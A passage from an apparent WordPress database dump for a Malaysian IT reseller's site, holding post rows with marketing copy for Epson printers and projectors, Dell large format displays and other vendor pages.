from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" />\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /><br>\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" />\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INTERACTIVE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-536WiÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></h4>\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\n<ul>\n 	<li>WXGA Resolution</li>\n 	<li>White and Colour Brightness at 3,300lm</li>\n 	<li>Multi-PC projection</li>\n 	<li>HDMI Connectivity x2</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>HIGH BRIGHTNESS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-L1405UNLÂ </strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>		\n		[maxbutton id=\"12\" ]<h4><strong>Epson EB-G7400UNLÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /><br>\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.</em>\n<ul>\n 	<li>High Brightness</li>\n 	<li>Beyond Full HD Resolution</li>\n 	<li>Powered Lens</li>\n 	<li>Portrait Projection</li>\n 	<li>Flexible Installation</li>\n 	<li>Edge Blending</li>\n 	<li>Point Correction</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-Z10000UÂ </strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>		\n		[maxbutton id=\"12\" ]		\n			<h2>DOCUMENT CAMERAS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Document Camera ELPDC21Â </strong><br><br><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></h4><br>\nCut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.\n<ul>\n 	<li>Pixels: 2MP (1920 x 1080 pixels)</li>\n 	<li>Camera Sensor: 1/2.7 inch CMOS Sensor</li>\n 	<li>Resolution: Up to Full HD (1080p)</li>\n 	<li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li>\n 	<li>Weight: Approx 3.0kg</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 11:22:47','2019-09-26 03:22:47','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3506,1,'2019-09-26 11:29:10','2019-09-26 03:29:10','ArCADia BIM, ArCADia-RAMA, INTERsoft-INTELLICAD <a href=\"https://bintara.com.my/arcadia/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1678\" src=\"https://bintara.com.my/wp-content/uploads/2019/09/Artboard-12x.png\" alt=\"\" width=\"1024\" height=\"681\" />','Arcadia','','publish','closed','closed','','arcadia','','','2019-10-01 11:21:47','2019-10-01 03:21:47','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=3506',0,'portfolio','',0),(3507,1,'2019-09-26 11:28:43','2019-09-26 03:28:43','Arcadia','Arcadia','Arcadia','inherit','closed','closed','','artboard-12x','','','2019-09-26 11:29:02','2019-09-26 03:29:02','',3506,'https://bintara.com.my/wp-content/uploads/2019/09/Artboard-12x.png',0,'attachment','image/png',0),(3508,1,'2019-10-01 11:21:30','2019-10-01 03:21:30','ArCADia BIM, ArCADia-RAMA, INTERsoft-INTELLICAD <a href=\"#\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1678\" src=\"https://bintara.com.my/wp-content/uploads/2019/09/Artboard-12x.png\" alt=\"\" width=\"1024\" height=\"681\" />','Arcadia','','inherit','closed','closed','','3506-autosave-v1','','','2019-10-01 11:21:30','2019-10-01 03:21:30','',3506,'https://bintara.com.my/blog/2019/09/26/3506-autosave-v1/',0,'revision','',0),(3511,1,'2019-09-26 12:10:23','2019-09-26 04:10:23','<p style=\"text-align: center; margin-top: -100px; font-size: 1.25rem;\">BINTARA is a multi-brand technology solutions provider to business, government, education and\r\nhealthcare organisations in Malaysia. We help our clients achieve their goals by delivering integrated solutions and services that maximise their technology investment.</p>','ABOUT','','inherit','closed','closed','','1287-revision-v1','','','2019-09-26 12:10:23','2019-09-26 04:10:23','',1287,'https://bintara.com.my/blog/2019/09/26/1287-revision-v1/',0,'revision','',0),(3510,1,'2019-09-26 12:09:43','2019-09-26 04:09:43','<p style=\"text-align: center; margin-top: -100px; font-size: 1.25rem;\">BINTARA is a multi-brand technology solutions provider to business, government, education and\r\nhealthcare organisations in Malaysia. We help our clients achieve their goals by delivering integrated solutions and services that maximise their technology investment.</p>','<h1>ABOUT</h1>','','inherit','closed','closed','','1287-revision-v1','','','2019-09-26 12:09:43','2019-09-26 04:09:43','',1287,'https://bintara.com.my/blog/2019/09/26/1287-revision-v1/',0,'revision','',0),(3673,1,'2019-10-29 09:01:44','2019-10-29 01:01:44','<img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_02.jpg\" alt=\"Transform your meeting space\" />\r\n<h2>Transform your meeting space</h2>\r\nDell, the worldâ€™s number one monitor brand, has the tools and technology you need to facilitate teamwork. With our open standards approach andÂ wide variety of displays ranging from 55â€ to 86â€, itâ€™s easy to find andÂ customize a solutionÂ that keeps your team engaged and lets your business thrive.\r\n<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Maximize your teamâ€™s productivity</h2>\r\nMake meetings more efficient with our collaboration-enhancing features and easy connectivity.\r\n\r\n<img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_03.jpg\" alt=\"Maximize your teamâ€™s productivity\" />\r\n\r\n<img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_04.jpg\" alt=\"Next-level teamwork\" width=\"347\" height=\"256\" />\r\n<h2>Next-level teamwork</h2>\r\n<strong>More ways to interact:</strong>Â Group collaboration is more seamless and intuitive than ever with our interactive monitors<a rel=\"technotes:available-monitors\">*</a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.\r\n\r\n<strong>Collaboration solutions:</strong>Â Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a rel=\"technotes:available-monitors\">*</a>.\r\n\r\n<strong>Collaboration for all:</strong>Â Dell Screen Drop feature<a rel=\"technotes:available-monitors\">*</a>Â lets you lower the displayed image so that itâ€™s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.\r\n<h2>Captivate your audience</h2>\r\n<ul>\r\n 	<li><strong>Make the most of your meeting:</strong>Â With a wide variety of connectivity options, you can quickly connect to the display and seamlessly switch between presenters, allowing your audience to enjoy a smooth and continuous presentation.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>Present crisply and clearly:</strong>Â Monitor scaling technology allows you to capture your audienceâ€™s attention with exceptionally clear text and vivid visuals.</li>\r\n</ul>\r\n<img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_05.jpg\" alt=\"Captivate your audience\" width=\"360\" height=\"267\" />\r\n<h2>Dell Large Format Monitors</h2>\r\nhttps://www.youtube.com/watch?v=Z98yJnbXWq8\r\n<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Flexible IT solutions</h2>\r\nA variety of customization, deployment and management options make Dell Large Format Monitors easy to manage.\r\n\r\n<img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_06.jpg\" alt=\"Flexible IT solutions\" width=\"445\" height=\"351\" />\r\n\r\n<img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_07.jpg\" alt=\"Adapts to business needs. Present and future.\" />\r\n<h2>Adapts to business needs. Present and future.</h2>\r\n<ul>\r\n 	<li><strong>Solutions that work with you:</strong>Â Dell Large Format Monitors work with a variety of hardware and software, so you can continue using the technology youâ€™re comfortable with or choose to use some of ours. This makes your new monitor inherently easy to deploy, maintain and use. It can alsoÂ be loaded with your preferred corporate image, so that it adheres to your security and service standards.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>Customized to your needs:</strong>Â Your Large Format Monitor will fit your business needs as they evolve. Select the technology you need without paying for unnecessary features and, with its modular capabilities, you can even scale up or down as your needs change.</li>\r\n</ul>\r\n<h2>Easy to deploy. Simple to manage.</h2>\r\n<ul>\r\n 	<li><strong>A smooth deployment:</strong>Â With a few painless steps, and a couple of extra hands, itâ€™s simple to install a Dell Large Format Monitor to a solid wall. Our displays are VESA compatible, so you can pick the mounting solution that best fits your space, whether thatâ€™s a mobile cart, stand or wall mount.</li>\r\n 	<li><strong>Manage your meeting spaces:</strong>Â With RS232 and RJ45<a rel=\"technotes:available-monitors\">*</a>Â interfaces, you can use remote management tools to maintain and control your Large Format Monitors with a network control system.</li>\r\n</ul>\r\n<img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_08.jpg\" alt=\"Easy to deploy. Simple to manage.\" width=\"355\" height=\"263\" />\r\n\r\n<img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_09.jpg\" alt=\"Ultimate management\" width=\"337\" height=\"256\" />\r\n<h2>Ultimate management</h2>\r\n<ul>\r\n 	<li><strong>Seamless integration for easy access:</strong>Â Create an all-in-one solution with the optional Dell OptiPlex Micro PC. It seamlessly integrates into the display<a rel=\"technotes:available-monitors\">*</a>Â without the need for a separate power cord, simplifying access to WiFi, annotationÂ andÂ meeting room management applications.</li>\r\n 	<li><strong>Easy to upgrade:</strong>Â Thanks toÂ it\'sÂ modular design, the optional Dell OptiPlex Micro PC can be effortlessly upgraded, or replaced.</li>\r\n</ul>\r\n<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Solutions you can count on</h2>\r\nOur low maintenance monitors and reliable service solutions are here to support you through every presentation.\r\n\r\n<img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_10.jpg\" alt=\"Solutions you can count on\" width=\"412\" height=\"325\" />\r\n\r\n<img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_11.jpg\" alt=\"Dependable reliability\" />\r\n<h2>Dependable reliability</h2>\r\n<strong>Peace of mind comes standard:</strong>Â Your Large Format Monitor comes with a 3-year Advanced Exchange Service<a rel=\"technotes:advanced-exchange-service-monitors\">*</a>Â so that if a replacement becomes necessary, it will be shipped to you the next business day during the Limited Hardware Warranty. And, if you want longer-term coverage, you can extend the Limited Hardware Warranty<a rel=\"technotes:hardware-warranty-monitors\">*</a>Â up to 5-years for additional support.\r\n\r\n<strong>Low maintenance. Simple manageability:Â </strong>Save your staff time and your company money with these reliable, user-friendly monitors. With no hidden costs, annual maintenance or licensing fees, Dell Large Format Monitors can decrease both trouble tickets and training time for your team.','Dell Large Format Displays','','inherit','closed','closed','','3661-revision-v1','','','2019-10-29 09:01:44','2019-10-29 01:01:44','',3661,'https://bintara.com.my/blog/2019/10/29/3661-revision-v1/',0,'revision','',0),(3517,1,'2019-09-26 15:17:23','2019-09-26 07:17:23','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<ol>\r\n<li><strong>Ergonomics</strong></li>\r\n</ol>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n\r\n2. <strong>Environment</strong>\r\n\r\nOur dedication to quality allows our company to 